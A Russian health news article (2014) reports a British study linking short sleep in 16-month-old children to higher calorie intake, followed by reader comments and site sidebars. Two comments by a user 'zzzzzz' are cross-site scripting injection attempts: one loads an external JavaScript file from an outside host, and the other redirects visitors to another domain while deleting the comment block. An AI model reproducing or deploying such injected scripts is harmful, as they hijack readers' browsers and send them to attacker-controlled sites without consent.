Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Чем меньше спал, тем боль...  >>  Чем меньше спал, тем больше набрал! Кто мало спит, тот толстеет!
 
Обратная связь
 

Чем меньше спал, тем больше набрал! Кто мало спит, тот толстеет!

Размер шрифта
29 сентября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Здоровый долгий сон очень важен для каждого человека, однако, как оказалось, для маленьких детей он просто-таки жизненно необходим. Ведь если ребенок недосыпает, он больше ест, что может привести к ожирению и другим проблемам со здоровьем в дальнейшем.

Чем меньше спал, тем больше набрал! Кто мало спит, тот толстеет!

Ученые выяснили, что 16-месячные дети, которые спят менее десяти часов в день, потребляют в среднем на 105 калорий больше, чем те, которые спят по тринадцать часов и более. Такое увеличение суточной калорийности с 982 до 1087 калорий составляет целых 10% от суточной нормы.

Связь между едой, весом и сном была исследована ранее на более старших детях и взрослых, однако в настоящей работе в первую очередь была изучена связь между сном и калорийностью пищи для детей младше трех лет. Такая зависимость была найдена еще до того, как проявилась заметная разница в весе. Ученые пришли к выводу, что именно излишнее потребление калорий является ключевым механизмом того, как сон влияет на набор веса у маленьких детей. Процесс регулирования гормонов, отвечающих за аппетит, нарушается из-за недосыпа.

Исследование проводилось в Англии, в нем приняли участие 1 303 семьи. В каждой изучалась продолжительность сна ребенка в возрасте 16 месяцев и питание в возрасте 21 месяца. «Мы знаем, что более короткий сон в раннем детстве повышает риск развития ожирения, поэтому мы хотели выяснить, потребляют ли такие дети больше калорий», – объясняет доктор Аби Фишер. «Предыдущие исследования на взрослых и детях старшего возраста показали, что недостаток сна заставляет людей есть в больших количествах, чем обычно. Однако особенность маленьких детей состоит в том, что их режим питания контролируют родители».

«Главный вывод нашей работы – дети, которые меньше спят, потребляют слишком много калорий», – говорит доктор Фишер. «И хотя нужны дальнейшие исследования этого вопроса, родители уже сейчас должны быть в курсе этой проблемы».

Следите за режимом сна своего ребенка, давайте ему высыпаться как следует, тем самым вы поможете ему избежать многих проблем со здоровьем в будущем.

Другие материалы об ожирении и способах борьбы с ним ищите на страницах нашего специального проекта «Сбрось лишнее».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - his shadow

30 сентября 2014 в 10:11

Цитировать   |   Пожаловаться

«британские учёные» являются синонимом исследователей, работающих над совершенно безумными, идиотскими и не представляющими абсолютно никакой практической ценности псевдонаучными проектами.



2 - zzzzzz

30 июня 2015 в 18:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:28

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Во сколько ложиться спать, чтобы не попасть в аварию? Вы удивитесь!   Как прикорнуть и зарядиться энергией на день   Как выспаться   Сон сжигает жир! Сколько спать?  
03 июня 2013Недосып лечит депрессию. Сколько спать, чтобы не сойти с ума? 11 июля 2013Ворочаетесь по ночам? У вас в два раза больше шансов умереть раньше!
 
07 июня 2013Поможет ли зеленый чай похудеть? 01 ноября 2013ИНВИТРО – «Марка №1» в России
 

Слайдшоу

1
Как провести день, чтобы выспаться
Как студенческая жизнь влияет на здоровье
10 самых неожиданных причин бессонницы. Часть 2

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.